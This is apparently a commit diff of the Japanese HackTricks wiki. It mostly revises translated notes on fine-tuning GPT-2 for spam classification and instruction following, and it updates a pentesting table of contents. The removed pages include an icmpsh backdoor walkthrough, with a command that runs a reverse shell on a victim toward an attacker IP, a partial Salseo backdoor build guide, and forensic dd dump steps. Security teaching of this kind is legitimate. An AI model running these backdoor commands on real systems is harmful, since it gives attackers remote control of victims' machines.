もちろん、モデルをファインチューニングするためには、LLMを専門化するために使用する構造化データが必要です。[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb)で提案された例では、GPT2は、[https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip](https://archive.ics.uci.edu/static/public/228/sms+spam+collection.zip)のデータを使用して、メールがスパムかどうかを検出するようにファインチューニングされています。
このデータセットには「スパムでない」例が「スパム」よりもはるかに多く含まれているため、本書では**「スパムでない」例を「スパム」と同じ数だけのみ使用する**ことを提案していますしたがって、トレーニングデータから余分な例を削除します。この場合、各747例でした。
次に、**70%**のデータセットが**トレーニング**に、**10%**が**検証**に、**20%**が**テスト**に使用されます。
- **検証セット**は、トレーニングフェーズ中にモデルの**ハイパーパラメータ**をファインチューニングし、モデルアーキテクチャに関する決定を行うために使用され、見えないデータに対するモデルのパフォーマンスに関するフィードバックを提供することで、オーバーフィッティングを防ぐのに役立ちます。これは、最終評価をバイアスせずに反復的な改善を可能にします。
- **検証セット**は、トレーニングフェーズ中にモデルの**ハイパーパラメータ**をファインチューニングし、モデルアーキテクチャに関する決定を行うために使用され、見えないデータに対するモデルのパフォーマンスに関するフィードバックを提供することで、オーバーフィッティングを防ぐのに役立ちます。最終評価をバイアスすることなく反復的な改善を可能にします。
- これは、このデータセットに含まれるデータが直接トレーニングには使用されないが、最良の**ハイパーパラメータ**を調整するために使用されることを意味します。したがって、このセットはテストセットのようにモデルのパフォーマンスを評価するためには使用できません。
- 対照的に、**テストセット**は、モデルが完全にトレーニングされ、すべての調整が完了した**後にのみ**使用されます。これは、モデルが新しい見えないデータに一般化する能力を偏りなく評価します。このテストセットでの最終評価は、モデルが実際のアプリケーションでどのように機能するかの現実的な指標を提供します。
- 対照的に、**テストセット**は、モデルが完全にトレーニングされ、すべての調整が完了した**後にのみ**使用されます。これは、新しい見えないデータに対するモデルの一般化能力のバイアスのない評価を提供します。このテストセットでの最終評価は、モデルが実際のアプリケーションでどのように機能するかの現実的な指標を提供します。
### Entries length
トレーニング例は同じ長さのエントリ(この場合はメールテキスト)を期待するため、すべてのエントリを最大のものと同じ大きさにすることに決定し、`<|endoftext|>`のIDをパディングとして追加しました。
トレーニング例は同じ長さのエントリ(この場合はメールテキスト)を期待するため、すべてのエントリを最大のものと同じ大きさにすることに決定し、`<|endoftext|>`のIDをパディングとして追加しました。
### Initialize the model
オープンソースの事前学習済みウェイトを使用してモデルを初期化し、トレーニングを行います。これを以前に行ったことがあり、[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb)の指示に従えば、簡単に行ます。
オープンソースの事前学習済みウェイトを使用してモデルを初期化し、トレーニングます。これを以前に行ったことがあり、[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/ch06.ipynb)の指示に従えば、簡単に行うことができます。
## Classification head
@ -47,7 +49,7 @@ out_features=num_classes
```
## 調整するパラメータ
迅速にファインチューニングを行うためには、すべてのパラメータを調整するのではなく、最終的なパラメータの一部だけを調整する方が簡単です。これは、下層が一般的に基本的な言語構造と適用可能な意味論を捉えることが知られているためです。したがって、**最後の層だけをファインチューニングすることが通常は十分であり、より速いです**。
迅速にファインチューニングを行うためには、すべてのパラメータを調整するのではなく、最終的なパラメータの一部のみを調整する方が簡単です。これは、下層が一般的に基本的な言語構造と適用可能な意味論を捉えることが知られているためです。したがって、**最後の層だけをファインチューニングすることが通常は十分であり、より速いです**。
```python
# This code makes all the parameters of the model unrtainable
for param in model.parameters():
@ -103,8 +105,10 @@ return loss
## 完全なGPT2ファインチューニング分類コード
GPT2をスパム分類器としてファインチューニングするためのすべてのコードは[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb)で見つけることができます。
GPT2をスパム分類器としてファインチューニングするためのすべてのコードは[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch06/01_main-chapter-code/load-finetuned-model.ipynb)で見つけることができます。
## 参考文献
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

72
src/AI/AI-llm-architecture/7.2.-fine-tuning-to-follow-instructions.md
View File

@ -1,11 +1,13 @@
# 7.2. インストラクションに従うためのファインチューニング
# 7.2. 指示に従うためのファインチューニング
{{#include /banners/hacktricks-training.md}}
> [!TIP]
> このセクションの目的は、**テキストを生成するだけでなく、チャットボットとしてタスクに応答するなどの指示に従うように、すでに事前トレーニングされたモデルをファインチューニングする方法を示すことです。**
> このセクションの目的は、**テキストを生成するだけでなく、チャットボットとしてタスクに応答するなど、指示に従うように既に事前トレーニングされたモデルをファインチューニングする方法を示すこと**です。
## データセット
LLMを指示に従うようにファインチューニングするためには、指示と応答を含むデータセットが必要です。LLMを指示に従うようにトレーニングするための異なるフォーマットがあります。例えば:
指示に従うようにLLMをファインチューニングするためには、指示と応答を含むデータセットが必要です。指示に従うようにLLMをトレーニングするための異なるフォーマットがあります。例えば:
- Apply Alpacaプロンプトスタイルの例
```csharp
@ -27,9 +29,9 @@ Can you explain what gravity is in simple terms?
<|Assistant|>
Absolutely! Gravity is a force that pulls objects toward each other.
```
LLMをこれらの種類のデータセットでトレーニングすることは、生のテキストだけでなく、LLMが受け取る質問に対して具体的な応答を提供する必要があることを理解するのに役立ちます。
トレーニングデータセットに生のテキストだけでなく、このようなデータセットを使用することで、LLMは受け取った質問に対して具体的な回答を提供する必要があることを理解するのに役立ちます。
したがって、リクエストと回答を含むデータセットで最初に行うべきことの1つは、そのデータを希望するプロンプト形式モデル化することです。例えば:
したがって、リクエストと回答を含むデータセットで最初に行うべきことの1つは、そのデータを希望するプロンプト形式モデル化することです。例えば:
```python
# Code from https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/ch07.ipynb
def format_input(entry):
@ -49,52 +51,54 @@ desired_response = f"\n\n### Response:\n{data[50]['output']}"
print(model_input + desired_response)
```
そのため、常にデータセットをトレーニング、検証、テスト用のセットに分ける必要があります。
Then, as always, it's needed to separate the dataset in sets for training, validation and testing.
## バッチ処理とデータローダー
## Batching & Data Loaders
次に、トレーニング用のすべての入力と期待される出力をバッチ処理する必要があります。これには以下が必要です:
Then, it's needed to batch all the inputs and expected outputs for the training. For this, it's needed to:
- テキストをトークン化する
- すべてのサンプルを同じ長さにパディングする通常、長さはLLMの事前トレーニングに使用されるコンテキストの長さと同じくらいになります
- すべてのサンプルを同じ長さにパディングする通常、長さはLLMの事前トレーニングに使用されるコンテキストの長さと同じくらい大きくなる
- カスタムコレート関数で入力を1つシフトして期待されるトークンを作成する
- トレーニング損失から除外するために、一部のパディングトークンを-100に置き換える最初の`endoftext`トークンの後、他のすべての`endoftext`トークンを-100に置き換えます(`cross_entropy(...,ignore_index=-100)`を使用することで、-100のターゲットを無視します
- \[オプション\] LLMが回答を生成する方法のみを学習するように、質問に属するすべてのトークンも-100でマスクします。Alpacaスタイルを適用する場合、これは`### Response:`までのすべてをマスクすることを意味します。
- トレーニング損失から除外するために、いくつかのパディングトークンを-100に置き換える最初の`endoftext`トークンの後、他のすべての`endoftext`トークンを-100に置き換える(`cross_entropy(...,ignore_index=-100)`を使用することは、-100のターゲットを無視することを意味する
- \[オプション\] LLMが回答を生成する方法のみを学習するように、質問に属するすべてのトークンも-100を使用してマスクする。Alpacaスタイルを適用する場合、これは`### Response:`までのすべてをマスクすることを意味する
これが作成されたら、各データセット(トレーニング、検証、テスト)のデータローダーを作成する時間です。
## 事前トレーニングされたLLMのロードとファインチューニングおよび損失チェック
## Load pre-trained LLM & Fine tune & Loss Checking
ファインチューニングするために、事前トレーニングされたLLMをロードする必要があります。これは他のページで既に議論されています。その後、以前に使用したトレーニング関数を使用してLLMをファインチューニングできます。
It's needed to load a pre-trained LLM to fine tune it. This was already discussed in other pages. Then, it's possible to use the previously used training function to fine tune the LLM.
トレーニング中、エポックごとにトレーニング損失と検証損失がどのように変化するかを確認して、損失が減少しているか、過学習が発生しているかを確認することも可能です。\
過学習は、トレーニング損失が減少しているが、検証損失が減少していないか、むしろ増加している場合に発生します。これを避けるために、最も簡単な方法は、この挙動が始まるエポックでトレーニングを停止することです。
During the training it's also possible to see how the training loss and validation loss varies during the epochs to see if the loss is getting reduced and if overfitting is ocurring.\
Remember that overfitting occurs when the training loss is getting reduced but the validation loss is not being reduced or even increasing. To avoid this, the simplest thing to do is to stop the training at the epoch where this behaviour start.
## 応答の質
## Response Quality
これは分類ファインチューニングではないため、損失の変動をより信頼できるわけではありませんが、テストセットの応答の質を確認することも重要です。したがって、生成された応答をすべてのテストセットから収集し、**手動でその質を確認する**ことをお勧めします。間違った回答があるかどうかを確認しますLLMが応答文の形式と構文を正しく作成することは可能ですが、完全に間違った応答を返すことがあります。損失の変動はこの挙動を反映しません\
生成された応答と期待される応答を**他のLLMに渡して応答を評価させる**ことでも、このレビューを行うことが可能です。
As this is not a classification fine-tune were it's possible to trust more the loss variations, it's also important to check the quality of the responses in the testing set. Therefore, it's recommended to gather the generated responses from all the testing sets and **check their quality manually** to see if there are wrong answers (note that it's possible for the LLM to create correctly the format and syntax of the response sentence but gives a completely wrong response. The loss variation won't reflect this behaviour).\
Note that it's also possible to perform this review by passing the generated responses and the expected responses to **other LLMs and ask them to evaluate the responses**.
応答の質を確認するために実行する他のテスト:
Other test to run to verify the quality of the responses:
1. **大規模マルチタスク言語理解(**[**MMLU**](https://arxiv.org/abs/2009.03300)**** MMLUは、文科、科学など57の科目にわたるモデルの知識と問題解決能力を評価します。さまざまな難易度の選択肢問題を使用して理解を評価します。
2. [**LMSYSチャットボットアリーナ**](https://arena.lmsys.org):このプラットフォームでは、ユーザーが異なるチャットボットの応答を並べて比較できます。ユーザーがプロンプトを入力すると、複数のチャットボットが応答を生成し、直接比較できます。
3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**** AlpacaEvalは、GPT-4のような高度なLLMがさまざまなプロンプトに対する他のモデルの応答を評価する自動評価フレームワークです。
4. **一般言語理解評価(**[**GLUE**](https://gluebenchmark.com/)**** GLUEは、感情分析、テキストの含意、質問応答など、9つの自然言語理解タスクのコレクションです。
5. [**SuperGLUE**](https://super.gluebenchmark.com/)**** GLUEを基にして、SuperGLUEは現在のモデルにとって難しいとされるより挑戦的なタスクを含んでいます。
6. **模倣ゲームベンチマークを超えて(**[**BIG-bench**](https://github.com/google/BIG-bench)**** BIG-benchは、推論、翻訳、質問応答などの分野でモデルの能力をテストする200以上のタスクを持つ大規模なベンチマークです。
7. **言語モデルの包括的評価(**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**** HELMは、精度、堅牢性、公平性など、さまざまな指標にわたる包括的な評価を提供します。
8. [**OpenAI Evals**](https://github.com/openai/evals)**** OpenAIによるオープンソースの評価フレームワークで、カスタムおよび標準化されたタスクでAIモデルをテストできます。
9. [**HumanEval**](https://github.com/openai/human-eval)**** コード生成能力を評価するために使用されるプログラミング問題のコレクションです。
10. **スタンフォード質問応答データセット(**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**** SQuADは、モデルが正確に回答するためにテキストを理解しなければならないWikipedia記事に関する質問で構成されています。
11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**** トリビアの質問と回答の大規模データセットで、証拠文書も含まれています。
1. **Measuring Massive Multitask Language Understanding (**[**MMLU**](https://arxiv.org/abs/2009.03300)**):** MMLU evaluates a model's knowledge and problem-solving abilities across 57 subjects, including humanities, sciences, and more. It uses multiple-choice questions to assess understanding at various difficulty levels, from elementary to advanced professional.
2. [**LMSYS Chatbot Arena**](https://arena.lmsys.org): This platform allows users to compare responses from different chatbots side by side. Users input a prompt, and multiple chatbots generate responses that can be directly compared.
3. [**AlpacaEval**](https://github.com/tatsu-lab/alpaca_eval)**:** AlpacaEval is an automated evaluation framework where an advanced LLM like GPT-4 assesses the responses of other models to various prompts.
4. **General Language Understanding Evaluation (**[**GLUE**](https://gluebenchmark.com/)**):** GLUE is a collection of nine natural language understanding tasks, including sentiment analysis, textual entailment, and question answering.
5. [**SuperGLUE**](https://super.gluebenchmark.com/)**:** Building upon GLUE, SuperGLUE includes more challenging tasks designed to be difficult for current models.
6. **Beyond the Imitation Game Benchmark (**[**BIG-bench**](https://github.com/google/BIG-bench)**):** BIG-bench is a large-scale benchmark with over 200 tasks that test a model's abilities in areas like reasoning, translation, and question answering.
7. **Holistic Evaluation of Language Models (**[**HELM**](https://crfm.stanford.edu/helm/lite/latest/)**):** HELM provides a comprehensive evaluation across various metrics like accuracy, robustness, and fairness.
8. [**OpenAI Evals**](https://github.com/openai/evals)**:** An open-source evaluation framework by OpenAI that allows for the testing of AI models on custom and standardized tasks.
9. [**HumanEval**](https://github.com/openai/human-eval)**:** A collection of programming problems used to evaluate code generation abilities of language models.
10. **Stanford Question Answering Dataset (**[**SQuAD**](https://rajpurkar.github.io/SQuAD-explorer/)**):** SQuAD consists of questions about Wikipedia articles, where models must comprehend the text to answer accurately.
11. [**TriviaQA**](https://nlp.cs.washington.edu/triviaqa/)**:** A large-scale dataset of trivia questions and answers, along with evidence documents.
その他多数
and many many more
## 指示に従ったファインチューニングコード
## Follow instructions fine-tuning code
このファインチューニングを実行するためのコードの例は、[https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)で見つけることができます。
You can find an example of the code to perform this fine tuning in [https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py](https://github.com/rasbt/LLMs-from-scratch/blob/main/ch07/01_main-chapter-code/gpt_instruction_finetuning.py)
## 参考文献
## References
- [https://www.manning.com/books/build-a-large-language-model-from-scratch](https://www.manning.com/books/build-a-large-language-model-from-scratch)
{{#include /banners/hacktricks-training.md}}

14
src/AI/AI-llm-architecture/README.md
View File

@ -1,10 +1,12 @@
# LLMトレーニング - データ準備
**これは非常に推奨される本** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **からの私のメモで、いくつかの追加情報が含まれています。**
{{#include /banners/hacktricks-training.md}}
**これは非常に推奨される本** [**https://www.manning.com/books/build-a-large-language-model-from-scratch**](https://www.manning.com/books/build-a-large-language-model-from-scratch) **からの私のメモで、いくつかの追加情報があります。**
## 基本情報
まず、知っておくべき基本概念についてこの投稿を読むべきです
まず、この投稿を読んで、知っておくべき基本的な概念を理解してください
{{#ref}}
0.-basic-llm-concepts.md
@ -32,7 +34,7 @@
> [!TIP]
> この第三段階の目標は非常にシンプルです:**語彙内の各トークンにモデルをトレーニングするために必要な次元のベクトルを割り当てること**。語彙内の各単語はX次元の空間内の点になります。\
> 最初は各単語の空間内の位置は「ランダムに」初期化され、これらの位置はトレーニング中に改善されるトレーニング可能なパラメータです。
> 最初は各単語の空間内の位置は「ランダムに」初期化され、これらの位置はトレーニング中に改善されるトレーニング可能なパラメータです。
>
> さらに、トークン埋め込み中に**別の埋め込み層が作成され**、これは(この場合)**トレーニング文内の単語の絶対位置を表します**。このように、文内の異なる位置にある単語は異なる表現(意味)を持ちます。
@ -43,7 +45,7 @@
## 4. アテンションメカニズム
> [!TIP]
> この第四段階の目標は非常にシンプルです:**いくつかのアテンションメカニズムを適用すること**。これらは**語彙内の単語と現在トレーニングに使用されている文内の隣接単語との関係を捉えるための多くの**繰り返し層**になります**。\
> この第四段階の目標は非常にシンプルです:**いくつかのアテンションメカニズムを適用すること**。これらは**語彙内の単語と現在トレーニングに使用されている文内の隣接単語との関係を捉える**ための**繰り返し層**になります。\
> これには多くの層が使用されるため、多くのトレーニング可能なパラメータがこの情報を捉えることになります。
{{#ref}}
@ -64,7 +66,7 @@
## 6. 事前トレーニングとモデルの読み込み
> [!TIP]
> この第六段階の目標は非常にシンプルです:**ゼロからモデルをトレーニングすること**。これには、定義された損失関数とオプティマイザを使用して、モデルのすべてのパラメータをトレーニングするためにデータセットをループする前のLLMアーキテクチャが使用されます。
> この第六段階の目標は非常にシンプルです:**ゼロからモデルをトレーニングすること**。これには、定義された損失関数とオプティマイザを使用して、モデルのすべてのパラメータをトレーニングするために前のLLMアーキテクチャが使用されます。
{{#ref}}
6.-pre-training-and-loading-models.md
@ -96,3 +98,5 @@
{{#ref}}
7.2.-fine-tuning-to-follow-instructions.md
{{#endref}}
{{#include /banners/hacktricks-training.md}}

30
src/SUMMARY.md
View File

@ -149,6 +149,7 @@
- [macOS AppleFS](macos-hardening/macos-security-and-privilege-escalation/macos-applefs.md)
- [macOS Bypassing Firewalls](macos-hardening/macos-security-and-privilege-escalation/macos-bypassing-firewalls.md)
- [macOS Defensive Apps](macos-hardening/macos-security-and-privilege-escalation/macos-defensive-apps.md)
- [Macos Dyld Hijacking And Dyld Insert Libraries](macos-hardening/macos-security-and-privilege-escalation/macos-dyld-hijacking-and-dyld_insert_libraries.md)
- [macOS GCD - Grand Central Dispatch](macos-hardening/macos-security-and-privilege-escalation/macos-gcd-grand-central-dispatch.md)
- [macOS Kernel & System Extensions](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md)
- [macOS IOKit](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-iokit.md)
@ -217,8 +218,10 @@
# 🪟 Windows Hardening
- [Authentication Credentials Uac And Efs](windows-hardening/authentication-credentials-uac-and-efs.md)
- [Checklist - Local Windows Privilege Escalation](windows-hardening/checklist-windows-privilege-escalation.md)
- [Windows Local Privilege Escalation](windows-hardening/windows-local-privilege-escalation/README.md)
- [Dll Hijacking](windows-hardening/windows-local-privilege-escalation/dll-hijacking.md)
- [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)
- [Access Tokens](windows-hardening/windows-local-privilege-escalation/access-tokens.md)
- [ACLs - DACLs/SACLs/ACEs](windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md)
@ -248,6 +251,7 @@
- [AD CS Domain Escalation](windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md)
- [AD CS Domain Persistence](windows-hardening/active-directory-methodology/ad-certificates/domain-persistence.md)
- [AD CS Certificate Theft](windows-hardening/active-directory-methodology/ad-certificates/certificate-theft.md)
- [Ad Certificates](windows-hardening/active-directory-methodology/ad-certificates.md)
- [AD information in printers](windows-hardening/active-directory-methodology/ad-information-in-printers.md)
- [AD DNS Records](windows-hardening/active-directory-methodology/ad-dns-records.md)
- [ASREPRoast](windows-hardening/active-directory-methodology/asreproast.md)
@ -330,7 +334,7 @@
- [Manual DeObfuscation](mobile-pentesting/android-app-pentesting/manual-deobfuscation.md)
- [React Native Application](mobile-pentesting/android-app-pentesting/react-native-application.md)
- [Reversing Native Libraries](mobile-pentesting/android-app-pentesting/reversing-native-libraries.md)
- [Smali - Decompiling/\[Modifying\]/Compiling](mobile-pentesting/android-app-pentesting/smali-changes.md)
- [Smali - Decompiling, Modifying, Compiling](mobile-pentesting/android-app-pentesting/smali-changes.md)
- [Spoofing your location in Play Store](mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md)
- [Tapjacking](mobile-pentesting/android-app-pentesting/tapjacking.md)
- [Webview Attacks](mobile-pentesting/android-app-pentesting/webview-attacks.md)
@ -388,6 +392,7 @@
- [Buckets](network-services-pentesting/pentesting-web/buckets/README.md)
- [Firebase Database](network-services-pentesting/pentesting-web/buckets/firebase-database.md)
- [CGI](network-services-pentesting/pentesting-web/cgi.md)
- [Django](network-services-pentesting/pentesting-web/django.md)
- [DotNetNuke (DNN)](network-services-pentesting/pentesting-web/dotnetnuke-dnn.md)
- [Drupal](network-services-pentesting/pentesting-web/drupal/README.md)
- [Drupal RCE](network-services-pentesting/pentesting-web/drupal/drupal-rce.md)
@ -398,7 +403,6 @@
- [Flask](network-services-pentesting/pentesting-web/flask.md)
- [Git](network-services-pentesting/pentesting-web/git.md)
- [Golang](network-services-pentesting/pentesting-web/golang.md)
- [GWT - Google Web Toolkit](network-services-pentesting/pentesting-web/gwt-google-web-toolkit.md)
- [Grafana](network-services-pentesting/pentesting-web/grafana.md)
- [GraphQL](network-services-pentesting/pentesting-web/graphql.md)
- [H2 - Java SQL database](network-services-pentesting/pentesting-web/h2-java-sql-database.md)
@ -430,7 +434,7 @@
- [disable_functions bypass - via mem](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-via-mem.md)
- [disable_functions bypass - mod_cgi](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-mod_cgi.md)
- [disable_functions bypass - PHP 4 >= 4.2.0, PHP 5 pcntl_exec](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-4-greater-than-4.2.0-php-5-pcntl_exec.md)
- [PHP - RCE abusing object creation: new $\_GET\["a"\]($\_GET\["b"\])](network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md)
- [Php Rce Abusing Object Creation New Usd Get A Usd Get B](network-services-pentesting/pentesting-web/php-tricks-esp/php-rce-abusing-object-creation-new-usd_get-a-usd_get-b.md)
- [PHP SSRF](network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md)
- [PrestaShop](network-services-pentesting/pentesting-web/prestashop.md)
- [Python](network-services-pentesting/pentesting-web/python.md)
@ -438,6 +442,7 @@
- [Ruby Tricks](network-services-pentesting/pentesting-web/ruby-tricks.md)
- [Special HTTP headers$$external:network-services-pentesting/pentesting-web/special-http-headers.md$$]()
- [Source code Review / SAST Tools](network-services-pentesting/pentesting-web/code-review-tools.md)
- [Special Http Headers](network-services-pentesting/pentesting-web/special-http-headers.md)
- [Spring Actuators](network-services-pentesting/pentesting-web/spring-actuators.md)
- [Symfony](network-services-pentesting/pentesting-web/symphony.md)
- [Tomcat](network-services-pentesting/pentesting-web/tomcat/README.md)
@ -582,6 +587,7 @@
- [Exploiting \_\_VIEWSTATE without knowing the secrets](pentesting-web/deserialization/exploiting-__viewstate-parameter.md)
- [Python Yaml Deserialization](pentesting-web/deserialization/python-yaml-deserialization.md)
- [JNDI - Java Naming and Directory Interface & Log4Shell](pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md)
- [Ruby Json Pollution](pentesting-web/deserialization/ruby-_json-pollution.md)
- [Ruby Class Pollution](pentesting-web/deserialization/ruby-class-pollution.md)
- [Domain/Subdomain takeover](pentesting-web/domain-subdomain-takeover.md)
- [Email Injections](pentesting-web/email-injections.md)
@ -609,6 +615,7 @@
- [hop-by-hop headers](pentesting-web/abusing-hop-by-hop-headers.md)
- [IDOR](pentesting-web/idor.md)
- [JWT Vulnerabilities (Json Web Tokens)](pentesting-web/hacking-jwt-json-web-tokens.md)
- [JSON, XML and YAML Hacking](pentesting-web/json-xml-yaml-hacking.md)
- [LDAP Injection](pentesting-web/ldap-injection.md)
- [Login Bypass](pentesting-web/login-bypass/README.md)
- [Login bypass List](pentesting-web/login-bypass/sql-login-bypass.md)
@ -641,6 +648,7 @@
- [MySQL File priv to SSRF/RCE](pentesting-web/sql-injection/mysql-injection/mysql-ssrf.md)
- [Oracle injection](pentesting-web/sql-injection/oracle-injection.md)
- [Cypher Injection (neo4j)](pentesting-web/sql-injection/cypher-injection-neo4j.md)
- [Sqlmap](pentesting-web/sql-injection/sqlmap.md)
- [PostgreSQL injection](pentesting-web/sql-injection/postgresql-injection/README.md)
- [dblink/lo_import data exfiltration](pentesting-web/sql-injection/postgresql-injection/dblink-lo_import-data-exfiltration.md)
- [PL/pgSQL Password Bruteforce](pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md)
@ -664,6 +672,7 @@
- [WebSocket Attacks](pentesting-web/websocket-attacks.md)
- [Web Tool - WFuzz](pentesting-web/web-tool-wfuzz.md)
- [XPATH injection](pentesting-web/xpath-injection.md)
- [XS Search](pentesting-web/xs-search.md)
- [XSLT Server Side Injection (Extensible Stylesheet Language Transformations)](pentesting-web/xslt-server-side-injection-extensible-stylesheet-language-transformations.md)
- [XXE - XEE - XML External Entity](pentesting-web/xxe-xee-xml-external-entity.md)
- [XSS (Cross Site Scripting)](pentesting-web/xss-cross-site-scripting/README.md)
@ -845,13 +854,14 @@
# ✍️ TODO
- [Other Big References](todo/references.md)
- [Interesting Http](todo/interesting-http.md)
- [Rust Basics](todo/rust-basics.md)
- [More Tools](todo/more-tools.md)
- [MISC](todo/misc.md)
- [Pentesting DNS](todo/pentesting-dns.md)
- [Hardware Hacking](todo/hardware-hacking/README.md)
- [Fault Injection Attacks](todo/hardware-hacking/fault_injection_attacks.md)
- [I2C](todo/hardware-hacking/i2c.md)
- [Side Channel Analysis](todo/hardware-hacking/side_channel_analysis.md)
- [UART](todo/hardware-hacking/uart.md)
- [Radio](todo/hardware-hacking/radio.md)
- [JTAG](todo/hardware-hacking/jtag.md)
@ -878,8 +888,6 @@
- [Other Web Tricks](todo/other-web-tricks.md)
- [Interesting HTTP$$external:todo/interesting-http.md$$]()
- [Android Forensics](todo/android-forensics.md)
- [TR-069](todo/tr-069.md)
- [6881/udp - Pentesting BitTorrent](todo/6881-udp-pentesting-bittorrent.md)
- [Online Platforms with API](todo/online-platforms-with-api.md)
- [Stealing Sensitive Information Disclosure from a Web](todo/stealing-sensitive-information-disclosure-from-a-web.md)
- [Post Exploitation](todo/post-exploitation.md)
@ -887,3 +895,11 @@
- [Cookies Policy](todo/cookies-policy.md)
- [Readme](blockchain/blockchain-and-crypto-currencies/README.md)
- [Readme](macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md)
- [Readme](network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md)
- [Readme](pentesting-web/web-vulnerabilities-methodology/README.md)
- [Readme](reversing/cryptographic-algorithms/README.md)
- [Readme](reversing/reversing-tools/README.md)
- [Readme](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens/README.md)

27
src/android-forensics.md
View File

@ -1,27 +0,0 @@
# Android Forensics
{{#include ./banners/hacktricks-training.md}}
## ロックされたデバイス
Androidデバイスからデータを抽出するには、デバイスのロックを解除する必要があります。ロックされている場合は、次のことができます。
- デバイスでUSB経由のデバッグが有効になっているか確認します。
- 可能な[スムッジ攻撃](https://www.usenix.org/legacy/event/woot10/tech/full_papers/Aviv.pdf)を確認します。
- [ブルートフォース](https://www.cultofmac.com/316532/this-brute-force-device-can-crack-any-iphones-pin-code/)を試みます。
## データ取得
[adbを使用してandroidバックアップを作成](mobile-pentesting/android-app-pentesting/adb-commands.md#backup)し、[Android Backup Extractor](https://sourceforge.net/projects/adbextractor/)を使用して抽出します:`java -jar abe.jar unpack file.backup file.tar`
### ルートアクセスまたはJTAGインターフェースへの物理接続がある場合
- `cat /proc/partitions`(フラッシュメモリへのパスを検索します。一般的に最初のエントリは _mmcblk0_ で、全体のフラッシュメモリに対応します)。
- `df /data`(システムのブロックサイズを確認します)。
- dd if=/dev/block/mmcblk0 of=/sdcard/blk0.img bs=4096ブロックサイズから得た情報を使用して実行します
### メモリ
Linux Memory Extractor (LiME)を使用してRAM情報を抽出します。これは、adb経由でロードする必要があるカーネル拡張です。
{{#include ./banners/hacktricks-training.md}}

25
src/backdoors/icmpsh.md
View File

@ -1,25 +0,0 @@
{{#include ../banners/hacktricks-training.md}}
バックドアをダウンロードする: [https://github.com/inquisb/icmpsh](https://github.com/inquisb/icmpsh)
# クライアント側
スクリプトを実行する: **run.sh**
**エラーが発生した場合は、行を変更してみてください:**
```bash
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
```
**対象:**
```bash
echo Please insert the IP where you want to listen
read IP
```
# **被害者側**
**icmpsh.exe** を被害者にアップロードし、実行します:
```bash
icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
```
{{#include ../banners/hacktricks-training.md}}

158
src/backdoors/salseo.md
View File

@ -1,158 +0,0 @@
# Salseo
{{#include ../banners/hacktricks-training.md}}
## バイナリのコンパイル
GitHubからソースコードをダウンロードし、**EvilSalsa**と**SalseoLoader**をコンパイルします。コードをコンパイルするには**Visual Studio**が必要です。
使用するWindowsボックスのアーキテクチャに合わせてこれらのプロジェクトをコンパイルしますWindowsがx64をサポートしている場合は、そのアーキテクチャ用にコンパイルしてください
**Visual Studio**の**左側の「Build」タブ**の**「Platform Target」**で**アーキテクチャを選択**できます。
**このオプションが見つからない場合は、**「Project Tab」**をクリックし、次に**「\<Project Name> Properties」**をクリックしてください。)
![](<../images/image (132).png>)
次に、両方のプロジェクトをビルドしますBuild -> Build Solutionログ内に実行可能ファイルのパスが表示されます
![](<../images/image (1) (2) (1) (1) (1).png>)
## バックドアの準備
まず、**EvilSalsa.dll**をエンコードする必要があります。そのためには、Pythonスクリプト**encrypterassembly.py**を使用するか、プロジェクト**EncrypterAssembly**をコンパイルします。
